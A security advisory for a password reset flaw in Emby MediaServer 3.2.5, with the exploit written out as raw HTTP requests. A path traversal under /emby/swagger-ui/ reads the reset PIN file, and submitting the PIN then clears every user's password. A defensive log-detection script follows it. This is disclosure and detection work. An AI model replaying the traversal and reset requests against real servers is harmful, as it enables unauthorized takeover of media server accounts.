
Emby MediaServer 3.2.5 Password Reset

Posted Apr 30, 2017
Authored by LiquidWorm | Site zeroscience.mk

Emby MediaServer version 3.2.5 suffers from a password reset vulnerability.

tags | exploit
SHA-256 | cd55b21a8347fa5960e9af67ccc648634aed53ed1e1e824ff18218bbc68ccdbe


Emby MediaServer 3.2.5 Password Reset Vulnerability


Vendor: Emby LLC
Product web page: https://www.emby.media
Affected version: 3.2.5
3.1.5
3.1.2
3.1.1
3.1.0
3.0.0

Summary: Emby (formerly Media Browser) is a media server designed to organize,
play, and stream audio and video to a variety of devices. Emby is open-source,
and uses a client-server model. Two comparable media servers are Plex and Windows
Media Center.

Desc: The issue can be triggered by an unauthenticated actor, but only from within the
home network (LAN). The attacker doesn't need to specify a valid username to reset the
password: he or she can enter a random string and then use the file disclosure issue
(ZSL-2017-5403) to read the PIN needed for the reset. Submitting the PIN discloses all
the valid usernames on the Emby server and resets every user's password to a blank
password. Attackers can exploit this to gain unauthenticated and unauthorized
access to the Emby media server management interface.

Tested on: Microsoft Windows 7 Professional SP1 (EN)
Mono-HTTPAPI/1.1, UPnP/1.0 DLNADOC/1.50
Ubuntu Linux 14.04.5
MacOS Sierra 10.12.3
SQLite3


Vulnerability discovered by Gjoko 'LiquidWorm' Krstic
@zeroscience


Advisory ID: ZSL-2017-5401
Advisory URL: http://zeroscience.mk/en/vulnerabilities/ZSL-2017-5401.php

SSD Advisory: https://blogs.securiteam.com/index.php/archives/3098


22.12.2016

--


1. First we initiate the Forgot Password feature from within our home network:
------------------------------------------------------------------------------

http://10.211.55.3:8096/web/forgotpassword.html


2. Then, we type any random username and hit submit:
----------------------------------------------------

POST /emby/Users/ForgotPassword HTTP/1.1
Host: 10.211.55.3:8096
Connection: keep-alive
Content-Length: 32
accept: application/json
Origin: http://10.211.55.3:8096
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_12_4) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/57.0.2987.133 Safari/537.36
x-emby-authorization: MediaBrowser Client="Emby Mobile", Device="Chrome", DeviceId="3848bd099140288b429e5189456c7354b531fc6b", Version="3.2.5.0"
content-type: application/x-www-form-urlencoded; charset=UTF-8
Referer: http://10.211.55.3:8096/web/forgotpassword.html
Accept-Encoding: gzip, deflate
Accept-Language: en-US,en;q=0.8,mk;q=0.6
DNT: 1

EnteredUsername=RandomusUsuarius



3. You will get an alert message (Windows/Linux):
-------------------------------------------------

The following file has been created on your server and contains instructions on how to proceed:

C:\Users\lqwrm\AppData\Roaming\\Emby-Server\passwordreset.txt

-- OR --

/var/lib/emby-server/passwordreset.txt


4. Exploiting the file disclosure vulnerability (ZSL-2017-5403):
----------------------------------------------------------------

GET /emby/swagger-ui/..\..\..\..\..\..\..\..\..\..\..\..\..\..\..\..\Users\lqwrm\AppData\Roaming\Emby-Server\passwordreset.txt HTTP/1.1
Host: 10.211.55.3:8096
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/55.0.2883.87 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Accept-Encoding: gzip, deflate, sdch
Accept-Language: en-US,en;q=0.8
Connection: close

HTTP/1.1 200 OK
X-UA-Compatible: IE=Edge
Access-Control-Allow-Headers: Content-Type, Authorization, Range, X-MediaBrowser-Token, X-Emby-Authorization
Access-Control-Allow-Methods: GET, POST, PUT, DELETE, PATCH, OPTIONS
Access-Control-Allow-Origin: *
Vary: Accept-Encoding
ETag: "c4fd834ac2fc99ff99d74c8e994a8a71"
Cache-Control: public
Expires: -1
Server: Mono-HTTPAPI/1.1, UPnP/1.0 DLNADOC/1.50
Content-Type: text/plain
Date: Tue, 28 Feb 2017 12:14:51 GMT
Content-Length: 164
Connection: close

Use your web browser to visit:

http://10.211.55.3:8096/web/forgotpasswordpin.html

Enter the following pin code:

6727

The pin code will expire at 91



5. Following the instructions and entering the PIN resets the passwords of all Emby users on the system:
--------------------------------------------------------------------------------------------------------

POST /emby/Users/ForgotPassword/Pin HTTP/1.1
Host: 10.211.55.3:8096
Connection: keep-alive
Content-Length: 9
accept: application/json
Origin: http://10.211.55.3:8096
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_12_4) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/57.0.2987.133 Safari/537.36
x-emby-authorization: MediaBrowser Client="Emby Mobile", Device="Chrome", DeviceId="3848bd099140288b429e5189456c7354b531fc6b", Version="3.2.5.0"
content-type: application/x-www-form-urlencoded; charset=UTF-8
Referer: http://10.211.55.3:8096/web/forgotpasswordpin.html
Accept-Encoding: gzip, deflate
Accept-Language: en-US,en;q=0.8,mk;q=0.6
DNT: 1

Pin=6272

---

We get the message:

Passwords have been removed for the following users. To login, sign in with a blank password.

testingus
test321
beebee
admin
ztefan
lio
miko
dni
embyusertest
joxypoxy
test123
thricer
teppei
admin2
delf1na
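
Detection sketch for the request chain in steps 2-5, added here as an example and not part of the original advisory: it scans access-log lines for traversal under /emby/swagger-ui/ and flags a client that requests a reset, reads passwordreset.txt through the traversal, and then submits a PIN. The common-log-format lines, client addresses, and function names are constructed assumptions (for instance, logs from a reverse proxy in front of Emby); only the /emby/ paths shown above are matched.

```python
import re
from urllib.parse import unquote

# Constructed access-log lines (common log format), not taken from the advisory.
SAMPLE = [
    '10.211.55.9 - - [28/Feb/2017:12:14:40 +0000] "POST /emby/Users/ForgotPassword HTTP/1.1" 200 87',
    '10.211.55.9 - - [28/Feb/2017:12:14:51 +0000] "GET /emby/swagger-ui/..%5C..%5CUsers%5Cexample%5CAppData%5CRoaming%5CEmby-Server%5Cpasswordreset.txt HTTP/1.1" 200 164',
    '10.211.55.9 - - [28/Feb/2017:12:15:02 +0000] "POST /emby/Users/ForgotPassword/Pin HTTP/1.1" 200 212',
    '10.211.55.20 - - [28/Feb/2017:12:20:00 +0000] "GET /emby/swagger-ui/index.html HTTP/1.1" 200 1432',
    '10.211.55.21 - - [28/Feb/2017:12:21:00 +0000] "POST /emby/Users/ForgotPassword HTTP/1.1" 200 87',
    '10.211.55.22 - - [28/Feb/2017:12:30:00 +0000] "GET /emby/swagger-ui/%252e%252e/%252e%252e/somefile HTTP/1.1" 404 0',
]
LINE = re.compile(r'^(\S+) \S+ \S+ \[[^\]]+\] "(\S+) (\S+) [^"]*" (\d{3})')

def normalize(path):
    """Drop the query, decode twice (double encoding), unify separators, lowercase."""
    return unquote(unquote(path.split("?", 1)[0])).replace("\\", "/").lower()

def classify(method, path):
    p = normalize(path)
    if p.startswith("/emby/swagger-ui/") and ".." in p.split("/"):
        return "traversal-reset-file" if p.endswith("/passwordreset.txt") else "traversal"
    if method == "POST" and p == "/emby/users/forgotpassword":
        return "reset-request"
    if method == "POST" and p == "/emby/users/forgotpassword/pin":
        return "pin-submit"
    return None

def analyze(lines):
    """Return (traversal findings, clients that completed the whole reset chain)."""
    findings, stage, chained = [], {}, []
    for line in lines:
        m = LINE.match(line)
        if not m:
            continue
        client, method, path, status = m.groups()
        kind = classify(method, path)
        if kind in ("traversal", "traversal-reset-file"):
            findings.append((client, kind, status))
        # Per-client chain: reset request -> reset-file read (200) -> PIN submit.
        s = stage.get(client, 0)
        if kind == "reset-request":
            stage[client] = max(s, 1)
        elif kind == "traversal-reset-file" and s >= 1 and status == "200":
            stage[client] = 2
        elif kind == "pin-submit" and s == 2:
            chained.append(client)
            stage[client] = 0
    return findings, chained

if __name__ == "__main__":
    print(analyze(SAMPLE))
```

A lone ForgotPassword request (client 10.211.55.21 in the sample) is not reported, since that is the legitimate use of the feature; only traversal requests and the completed three-step chain are.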
